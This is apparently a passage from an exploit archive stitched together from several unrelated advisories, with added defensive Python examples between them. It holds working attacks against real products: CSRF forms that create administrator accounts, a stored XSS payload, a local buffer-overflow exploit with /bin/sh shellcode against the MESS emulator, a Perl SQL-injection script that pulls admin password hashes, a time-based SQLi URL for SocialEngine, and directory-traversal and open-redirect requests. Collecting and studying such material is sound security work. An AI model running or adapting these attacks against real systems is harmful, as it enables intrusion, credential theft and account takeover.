<input value="hacker@hacker.com" name="EMAIL"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="DEPT" type="hidden"><input
value="true" type="hidden">
<input value="" name="LOCATION" type="hidden"><input
value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Stored XSS
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="service" value="1" />
<input type="hidden" name="serviceurl" value="1" />
<input type="hidden" name="loginname" value="1" />
<input type="hidden" name="password" value="<!-- --
--><script>alert('XSS');</script><!-- -- -->" />
<input type="hidden" name="spassword" value="" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="Rule" value="Low" />
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="SKIP_PREF" value="true" />
<input type="hidden" name="Admin" value="hacker" />
<input type="hidden" name="FORWARDURL"
value="UserTabView.cc%3F" />
<input type="submit" value="Submit">
</form>
</body>
</html>
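Every PoC form above works because the server accepts a state-changing POST from any origin with no token, and (issue 2) because it trusts the LOGINID/USERID and role fields in the body. The same gap is Obi-5 in the ObiHai advisory earlier on this page. The handler below is an added example, not code from either product; the request shape, session fields and site origin are constructed. It rejects a cross-origin post, requires a session-bound synchronizer token, and then applies the authorization rule the application was missing: a non-administrator may edit only their own record and never a role or super-admin field.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

SECRET = secrets.token_bytes(32)    # constructed per-deployment key; never leaves the server
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
PRIVILEGED_FIELDS = {"ROLE", "OLDROLE", "superAdmin", "superadminscope", "isloginusersa"}


def csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session; embed it in every state-changing form."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf(request: dict, site_origin: str) -> bool:
    """request is a constructed dict with method, headers, form and session_id.
    Letting safe methods through is only sound once no GET changes state
    (the toggleListenerStatus GET in issue 5 would have to become a POST)."""
    if request["method"].upper() in SAFE_METHODS:
        return True
    src = request["headers"].get("Origin") or request["headers"].get("Referer")
    if src is None or urlparse(src).netloc != urlparse(site_origin).netloc:
        return False                    # a form hosted elsewhere posts a foreign Origin
    token = request["form"].get("csrf_token", "")
    return hmac.compare_digest(token, csrf_token(request["session_id"]))


def authorize_user_edit(session: dict, form: dict) -> bool:
    """Issue 2: LOGINID/USERID in the body are not a capability. A non-admin may edit
    only their own record and may not touch any role or super-admin field."""
    if session["role"] == "Administrator":
        return True
    for key in ("LOGINID", "USERID"):
        if key in form and form[key] != session["login_id"]:
            return False
    return not (PRIVILEGED_FIELDS & set(form))


def handle_edit_user(request: dict, session: dict, site_origin: str) -> str:
    if not check_csrf(request, site_origin):
        return "403 csrf"
    if not authorize_user_edit(session, request["form"]):
        return "403 forbidden"
    return "200 ok"


if __name__ == "__main__":
    site = "https://192.168.0.3:7272"
    sess = {"login_id": "4", "role": "Password User"}
    forged = {"method": "POST", "headers": {"Origin": "https://attacker.example"},
              "form": {"LOGINID": "4", "USERID": "4", "superAdmin": "true"}, "session_id": "s1"}
    print(handle_edit_user(forged, sess, site))     # 403 csrf
```

Role changes made by an administrator should additionally require re-authentication or a second approver; the token only proves the request came from the user's own page, not that the user intended a privilege change.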
--
S3ba
@s3bap3
http://linkedin.com/in/s3bap3
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: Multi Emulator Super System (MESS)
# Version: 0.154-3.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
#
# Program description: MESS is an emulator for various consoles and computing systems, sharing a
# lot of codebase with the MAME project.
# Kali Linux 2.0 package: pool/non-free/m/mame/mess_0.154-3.1_i386.deb
# MD5sum: ae8650a6de842e6792ba83785ac0dbef
# Website: http://mamedev.org/
#
# gdb$ run -gamma $(python -c 'print "\x41"*4080')
# Starting program: /usr/games/mess -gamma $(python -c 'print "\x41"*4080')
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
#
# Program received signal SIGSEGV, Segmentation fault.
#
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000000 EBX: 0x72203B22 ECX: 0x00001024 EDX: 0xBFFFE094 o d I t S z a p c
# ESI: 0x00001024 EDI: 0xBFFFE095 EBP: 0x00001024 ESP: 0xBFFFD038 EIP: 0x41414141
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
#
# --------------------------------------------------------------------------[code]
# => 0x9684539: mov esi,DWORD PTR [ebx+0x48]
# 0x968453c: lea edi,[ebp+esi*1+0x0]
# 0x9684540: push edi
# 0x9684541: push ebx
# 0x9684542: call 0x96843b0
# 0x9684547: add esp,0x10
# 0x968454a: test al,al
# 0x968454c: je 0x96845ad
#
# --------------------------------------------------------------------------------
# 0x41414141 in ?? ()
#
# gdb$ backtrace
# #1 0x41414141 in ?? ()
import errno
import subprocess
import sys

def run():
    try:
        print "# Mess Emulator Buffer Overflow by Juan Sacco"
        print "# This exploit is for educational purposes only"
        # JUNK + SHELLCODE + NOPS + EIP
        junk = "\x41"*4084
        shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
        nops = "\x90"*12
        eip = "\xd1\xf3\xff\xbf"
        subprocess.call(["mess", ' ', junk + shellcode + nops + eip])
    except OSError as e:
        if e.errno == errno.ENOENT:
            print "Sorry, Mess emulator not found!"
        else:
            print "Error executing exploit"
            raise

def howtousage():
    print "Snap! Something went wrong"
    sys.exit(-1)

if __name__ == '__main__':
    try:
        print "Exploit Mess 0.154-3.1 Local Overflow Exploit"
        print "Author: Juan Sacco"
    except IndexError:
        howtousage()
    run()
* CVE: CVE-2016-3943
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Endpoint Administration Agent < v7.50.00
* Fixed Version: Panda Endpoint Administration Agent v7.50.00
Description:
Panda Endpoint Administration Agent v7.30.2 allows a local attacker to elevate his privileges from any account type (Guest included) and execute code as SYSTEM, thus completely compromising the affected host.
Affected Products:
Any Panda Security For Business products for Windows using this Agent service are vulnerable.
Technical Details:
Upon installing some Panda Security for Business products for Windows, such as Panda Endpoint Protection/Plus, a service named 'Panda Endpoint Administration Agent' is installed on the host. This service runs under the SYSTEM account. However, due to weak ACLs set on the installation directory ("C:\Program Files\Panda Security\WaAgent") of this application and its subdirectories, any user can modify or overwrite any executable module (dynamic link libraries and executables) installed in those directories.
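The condition the advisory describes is visible in the directory's ACL: an allow entry granting a broad principal (Users, Everyone, Authenticated Users) modify or write rights on a tree that a SYSTEM service loads code from. The checker below is an added example, not Nettitude's or Panda's code; it parses text in the layout `icacls` prints (path, then one `principal:(flags)` entry per line) and flags such entries, so it can be run over ACL dumps collected from many hosts. The two ACL listings are constructed to illustrate the weak and the expected state; they were not captured from a real installation.

```python
import re
from typing import List, Tuple

# Principals that mean "any local user"; none of them should hold write rights on
# a service's installation tree.
BROAD_PRINCIPALS = {"everyone", "builtin\\users", "nt authority\\authenticated users",
                    "nt authority\\interactive"}
# icacls simple rights (F, M, W, D) and specific rights that allow changing or
# replacing a file or its security descriptor.
WRITE_RIGHTS = {"F", "M", "W", "D", "DE", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}
_FLAG = re.compile(r"\(([^)]*)\)")


def parse_icacls(output: str, path: str) -> List[Tuple[str, List[str]]]:
    """(principal, [flag tokens]) for each ACE of one path. The first line carries the
    path before the first ACE; later ACEs are indented; summary lines are skipped."""
    aces = []
    for line in output.splitlines():
        ace = line.strip()
        if ace.startswith(path):
            ace = ace[len(path):].strip()
        if ":(" not in ace:
            continue
        principal, _, flags = ace.partition(":")
        tokens = [t for grp in _FLAG.findall(flags) for t in grp.split(",")]
        aces.append((principal, tokens))
    return aces


def weak_aces(output: str, path: str) -> List[Tuple[str, str]]:
    """Allow-ACEs that give a broad principal any write right. Empty means the tree is
    locked down the way the fixed agent version should leave it."""
    findings = []
    for principal, tokens in parse_icacls(output, path):
        if "DENY" in tokens or principal.lower() not in BROAD_PRINCIPALS:
            continue
        granted = sorted(set(tokens) & WRITE_RIGHTS)
        if granted:
            findings.append((principal, ",".join(granted)))
    return findings


PATH = r"C:\Program Files\Panda Security\WaAgent"
# Constructed icacls-style listings; not output from a real host.
WEAK = PATH + r""" NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                         BUILTIN\Administrators:(OI)(CI)(F)
                                         BUILTIN\Users:(OI)(CI)(M)
                                         NT AUTHORITY\Authenticated Users:(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
FIXED = PATH + r""" NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                         BUILTIN\Administrators:(OI)(CI)(F)
                                         BUILTIN\Users:(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    print(weak_aces(WEAK, PATH))    # [('BUILTIN\\Users', 'M')]
    print(weak_aces(FIXED, PATH))   # []
```

On a live host the input would come from `icacls "<path>" /T` run with administrative rights; the `/T` recursion matters because the advisory notes the subdirectories were affected too.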
Impact:
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
Disclosure Log:
Vendor Contacted: 12/01/2016
Public Disclosure: 05/04/2016
Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
Kyriakos Economou
Vulnerability Researcher
#!/usr/bin/perl -w
# # # # #
# Exploit Title: AlstraSoft Template Seller Pro v3.25e Script (buy.php)- Remote SQL Injection Vulnerability
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/template.htm
# Demo: http://blizsoft.com/templates/
# Version: 3.25e
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|----------------------------------------------------|\n";
print "| Template Seller Pro v3.25e Remote SQL Injector |\n";
print "| Author: Ihsan Sencan |\n";
print "| Author Web: http://ihsan.net |\n";
print "| Mail : ihsan[beygir]ihsan[nokta]net |\n";
print "| |\n";
print "| |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
$elicha="group_concat(user_name,char(58),user_password)";
$table="UserDB";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "buy.php?tempid=-1+union+select+1,2,3,".$elicha.",5,6,7,8+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n";
print "[+] Success !!\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html
CVE-2016-3672 - Unlimiting the stack no longer disables ASLR
Authors: Hector Marco & Ismael Ripoll
CVE: CVE-2016-3672
Dates: April 2016
Description
We have fixed an old and well-known weakness in the Linux ASLR implementation.
Any user able to run 32-bit applications on an x86 machine can disable ASLR by setting the RLIMIT_STACK resource to unlimited.
The following steps test whether your system is vulnerable:
1) Create a dummy program which shows its memory map:
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* getpid() */

int main(int argc, const char *argv[])
{
    char cmd[256];
    snprintf(cmd, sizeof(cmd), "cat /proc/%d/maps", (int)getpid());
    system(cmd);
    return 0;
}
2) Compile it:
$ gcc show_maps.c -o show_maps # In a i386 machine
$ gcc show_maps.c -o show_maps -m32 # In a 64-bit machine
3) Run the application to check that ASLR is working
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
f75c4000-f7769000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75db000-f7780000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7557000-f76fc000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7595000-f773a000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7574000-f7719000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75af000-f7754000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7530000-f76d5000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7529000-f76ce000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75c2000-f7767000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75fe000-f77a3000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at random positions, so ASLR is working properly.
Now we run the same test with the stack set to unlimited:
$ ulimit -a | grep stack
stack size (kbytes, -s) 8192
$ ulimit -s unlimited
stack size (kbytes, -s) unlimited
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at the same position in all executions: ASLR has been disabled.
This is a very old trick to disable ASLR, but unfortunately it was still present in current Linux systems.
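The shell loop above is the whole test; what follows automates the "did the base move?" judgement so it can be run in a build or hardening check. It is an added example, not part of the advisory. It parses `/proc/<pid>/maps` lines, picks the `r-xp` mapping of a named object, and reports how many distinct base addresses a set of runs produced: more than one means ASLR is in effect, exactly one means it is not. The sample runs are the libc lines from the two listings above; `collect_runs` assumes the advisory's `show_maps` binary has been built in the current directory.

```python
import re
import subprocess
from typing import Dict, List, Optional

# start-end perms offset dev inode [path]
_MAPS = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\d+\s*(.*)$")


def parse_maps(text: str) -> List[Dict]:
    rows = []
    for line in text.splitlines():
        m = _MAPS.match(line.strip())
        if m:
            rows.append({"start": int(m.group(1), 16), "end": int(m.group(2), 16),
                         "perms": m.group(3), "path": m.group(4).strip()})
    return rows


def text_base(maps: List[Dict], name: str) -> Optional[int]:
    """Start of the executable (r-xp) mapping whose path contains `name`."""
    for row in maps:
        if row["perms"] == "r-xp" and name in row["path"]:
            return row["start"]
    return None


def distinct_bases(runs: List[str], name: str = "libc") -> int:
    bases = {text_base(parse_maps(run), name) for run in runs}
    bases.discard(None)
    return len(bases)


def aslr_effective(runs: List[str], name: str = "libc") -> bool:
    """True when the mapping moved between runs; one address means no randomization.
    Use enough runs that a chance collision is negligible (the advisory uses ten)."""
    return distinct_bases(runs, name) > 1


def collect_runs(binary: str = "./show_maps", count: int = 10) -> List[str]:
    """Run the advisory's show_maps `count` times. Compare the result before and after
    `ulimit -s unlimited` in the launching shell; the binary is assumed to exist."""
    return [subprocess.run([binary], capture_output=True, text=True, check=True).stdout
            for _ in range(count)]


# Lines taken from the advisory's two test runs, one grep hit per execution.
RANDOMIZED = [
    "f75c4000-f7769000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so",
    "f75db000-f7780000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so",
    "f7557000-f76fc000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so",
]
UNLIMITED_STACK = ["5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so"] * 3

if __name__ == "__main__":
    print("ASLR effective:", aslr_effective(RANDOMIZED))          # True
    print("ASLR effective:", aslr_effective(UNLIMITED_STACK))     # False
```

Checking the main executable as well (pass its name instead of "libc") distinguishes the kernels the advisory mentions where the executable stays randomized from those where it does not.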
Vulnerable packages
The weakness, AFAIK, has been present since the first version in the current Linux git repository, Linux-2.6.12-rc2, dated April 2005.
Impact
An attacker capable of running 32-bit applications on an x86 machine is able to disable the ASLR of any application, including sensitive ones such as setuid and setgid programs. Note that this is not an exploitable vulnerability by itself but a trick to disable ASLR; an attacker can use it when trying to exploit some other bug. Since i386 is still widely used, the number of affected systems and users could be extremely large.
The weakness
The issue arises because the Linux ASLR implementation does not always randomize the mmap base address when the stack size is set to unlimited. Concretely, on i386, and on X86_64 when emulating X86_32 in legacy mode, only the stack and the executable are randomized, not the other mmapped files (libraries, vDSO, etc.). Depending on the Linux version, the executable is not randomized either.
The function that calculates the position of the libraries when the stack is set to unlimited is mmap_legacy_base():
static unsigned long mmap_legacy_base(void)
{
if (mmap_is_ia32())
return TASK_UNMAPPED_BASE;
else
return TASK_UNMAPPED_BASE + mmap_rnd();
}
The function doesn't add any random offset when running on a native 32-bit system (i386) or on a 32-bit emulated system (x86_32).
Exploit
To exploit this weakness, the attacker just needs to set the stack to unlimited and then execute a 32-bit application. Obviously the idea is to execute (attack) privileged applications such as setuid/setgid programs.
FIX
We have created a patch to fix this issue:
diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
index 96bd1e2..389939f 100644
--- a/arch/x86/mm/mmap.c
+++ b/arch/x86/mm/mmap.c
@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd)
}
/*
- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64
- * does, but not when emulating X86_32
- */
-static unsigned long mmap_legacy_base(unsigned long rnd)
-{
- if (mmap_is_ia32())
- return TASK_UNMAPPED_BASE;
- else
- return TASK_UNMAPPED_BASE + rnd;
-}
-
-/*
* This function, called very early during the creation of a new
* process VM image, sets up which VM layout function to use:
*/
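Review bot: removing mmap_legacy_base() also removes the only comment that explained why X86_32 was special ("Bottom-up (legacy) layout on X86_32 did not support randomization"), and nothing in the surviving comment block above arch_pick_mmap_layout() says that the legacy layout is now randomized on every x86 flavour; add a sentence there so the behavioural change is visible to the next reader. Note also that the deleted signature here is `mmap_legacy_base(unsigned long rnd)`, whereas the version quoted in the write-up above is `mmap_legacy_base(void)` calling mmap_rnd() itself; the patch targets the newer tree and will need adapting for the older kernels the advisory says are affected.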
@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm)
if (current->flags & PF_RANDOMIZE)
random_factor = arch_mmap_rnd();
- mm->mmap_legacy_base = mmap_legacy_base(random_factor);
+ mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;
if (mmap_is_legacy()) {
mm->mmap_base = mm->mmap_legacy_base;
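Review bot: `mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;` is only correct if `random_factor` is zero when PF_RANDOMIZE is clear, and its initialisation lies outside the visible context (the hunk starts at the `if (current->flags & PF_RANDOMIZE)` guard); confirm it is initialised to 0 rather than left indeterminate. The unchanged `mm->mmap_base = mm->mmap_legacy_base;` in the `mmap_is_legacy()` branch is what makes the new base reach a 32-bit process whose RLIMIT_STACK is unlimited, which is the intent, so the two lines should be mentioned together in the commit message.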
The patch enables randomization for the libraries, vDSO and mmap requests on i386 and on X86_32 in legacy mode. We have already sent the patch to the Linux maintainers, and the issue will not be a problem in upcoming Linux versions: Enable full randomization on i386 and X86_32
Discussion
Although this vulnerability is not exploitable by itself, the truth is that the ASLR protection mechanism is useless against local attacks on i386 and x86_32 systems whenever the attackers can launch the applications they attack.
Hector Marco - http://hmarco.org
Advisory ID: HTB23286
Product: SocialEngine
Vendor: Webligo
Vulnerable Version(s): 4.8.9 and probably prior
Tested Version: 4.8.9
Advisory Publication: December 21, 2015 [without technical details]
Vendor Notification: December 21, 2015
Public Disclosure: April 6, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in the popular social networking software SocialEngine. The vulnerability can be exploited to gain access to potentially sensitive information in the database and to compromise the entire website.
The vulnerability exists due to insufficient filtration of input data passed via the "orderby" HTTP GET parameter to the "/index.php" script. A remote unauthenticated attacker can modify the existing query and execute arbitrary SQL commands in the application's database.
The simple exploit below uses a time-based SQL injection technique to demonstrate the existence of the vulnerability. The following HTTP request makes the page take 99 seconds to render if the first character of the MySQL server version is "5":
http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29
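The "orderby" value lands inside an ORDER BY clause, which cannot be bound as a query parameter, so escaping alone does not fix it; the sort column has to be chosen from an allowlist. The following example is added here to show that point and is not SocialEngine's code: it uses an in-memory SQLite table with assumed names (`blogs`, `id`, `title`) in place of the MySQL schema, and because SQLite has no SLEEP() the blind oracle is expressed through row order instead of response time (a boolean-based variant of the same technique the advisory demonstrates with timing).

```python
import sqlite3

# Constructed sample rows standing in for a blog listing; not data from the advisory.
SAMPLE_ROWS = [(1, 'first post'), (2, 'second post'), (3, 'third post')]

# Assumed column names for this example only.
ORDERBY_ALLOWLIST = {'1': 'id', 'id': 'id', 'title': 'title'}


def make_db():
    """Create the in-memory table the two query builders run against."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE blogs (id INTEGER PRIMARY KEY, title TEXT)')
    conn.executemany('INSERT INTO blogs VALUES (?, ?)', SAMPLE_ROWS)
    return conn


def build_query_vulnerable(orderby):
    """The pattern behind the advisory: the request value is spliced into ORDER BY."""
    return 'SELECT id FROM blogs ORDER BY ' + orderby


def is_allowed(orderby):
    """True only for values that map onto a known sort column."""
    return orderby in ORDERBY_ALLOWLIST


def build_query_safe(orderby):
    """Map the request value onto a fixed column name; anything else is rejected."""
    if not is_allowed(orderby):
        raise ValueError('unsupported orderby value: %r' % orderby)
    return 'SELECT id FROM blogs ORDER BY ' + ORDERBY_ALLOWLIST[orderby]


def oracle_payload(condition):
    """Boolean-blind payload: the sort direction leaks whether `condition` holds.

    SQLite has no SLEEP(), so row order replaces the 99-second delay used in
    the MySQL request above.
    """
    return '(CASE WHEN (%s) THEN id ELSE -id END)' % condition


def ordered_ids(conn, sql):
    """Run a query and return the ids in the order the database produced them."""
    return [row[0] for row in conn.execute(sql)]


if __name__ == '__main__':
    conn = make_db()
    true_case = oracle_payload("sqlite_version() LIKE '3%'")
    false_case = oracle_payload("sqlite_version() LIKE '9%'")
    print('vulnerable, condition true :', ordered_ids(conn, build_query_vulnerable(true_case)))
    print('vulnerable, condition false:', ordered_ids(conn, build_query_vulnerable(false_case)))
    print('safe, orderby=title        :', ordered_ids(conn, build_query_safe('title')))
    print('safe accepts payload?      :', is_allowed(true_case))
```

With the vulnerable builder the attacker reads one bit per request from whether the ids come back ascending or descending; with the allowlisted builder the payload never reaches the SQL text at all.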
-----------------------------------------------------------------------------------------------
Solution:
Update to SocialEngine 4.8.10
More Information:
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7
Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.
Tested on: Apache Tomcat/5.5.23
Apache/2.2.3 (CentOS)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
09.03.2016
--
#1
Directory Traversal:
--------------------
http://10.0.0.7/../../../../../WEB-INF/web.xml
#2
Open Redirect:
--------------
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
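Both #1 and #2 are the same class of defect: a request value (a path, a redirect target) used without being reduced to something the application actually intends to serve. The example below is added here and is not Asbru's code; it shows the two checks a servlet front end would apply, with the host name `10.0.0.7` and docroot `/srv/www` as assumptions. It goes slightly beyond the two PoCs above in that the path check also decodes `%2f`-encoded separators before normalising.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Directories a servlet container must never serve directly (compared case-insensitively).
FORBIDDEN_DIRS = {'WEB-INF', 'META-INF'}


def normalise_request_path(request_path):
    """Decode and collapse '.', '..' and repeated separators into a canonical absolute path."""
    decoded = unquote(request_path).replace('\\', '/')
    # Strip leading slashes before re-adding one: posixpath keeps '//' as a
    # distinct prefix, which would survive normalisation.
    return posixpath.normpath('/' + decoded.lstrip('/'))


def is_forbidden_path(request_path):
    """True when any segment of the normalised path names a protected directory."""
    segments = normalise_request_path(request_path).split('/')
    return any(seg.upper() in FORBIDDEN_DIRS for seg in segments)


def resolve_under_docroot(docroot, request_path):
    """Map a request path onto the filesystem, refusing WEB-INF/META-INF after normalisation."""
    if is_forbidden_path(request_path):
        raise PermissionError('refusing to serve ' + request_path)
    return docroot.rstrip('/') + normalise_request_path(request_path)


def is_safe_redirect(url, allowed_host):
    """Accept only same-site redirect targets for a 'url=' style parameter.

    Allowed: a path starting with a single '/', or an absolute http(s) URL
    whose host is exactly allowed_host. Everything else (other hosts,
    scheme-relative '//host', 'javascript:' and friends) is rejected.
    """
    if not url or '\\' in url:
        return False
    parts = urlsplit(url)
    if parts.netloc:
        return parts.scheme in ('http', 'https') and parts.netloc.lower() == allowed_host.lower()
    if parts.scheme:
        return False
    return url.startswith('/') and not url.startswith('//')


if __name__ == '__main__':
    for target in ('/webadmin/index.jsp', 'http://www.zeroscience.mk', '//www.zeroscience.mk/x',
                   'http://10.0.0.7/webadmin/', 'javascript:alert(1)'):
        print('%-28s -> %s' % (target, is_safe_redirect(target, '10.0.0.7')))
    for path in ('/../../../../../WEB-INF/web.xml', '/images/..%2f..%2fWEB-INF/web.xml', '/css/../index.jsp'):
        try:
            print('%-40s -> %s' % (path, resolve_under_docroot('/srv/www', path)))
        except PermissionError as err:
            print('%-40s -> %s' % (path, err))
```

The redirect check deliberately compares the host exactly rather than by suffix, so `10.0.0.7.attacker.example` is not accepted; the path check runs after normalisation, so `/a/../WEB-INF/web.xml` and its percent-encoded forms are all caught by the same comparison.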
#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------
<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value=" <TEST></TEST> " />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test@testingus.io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984-01-01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
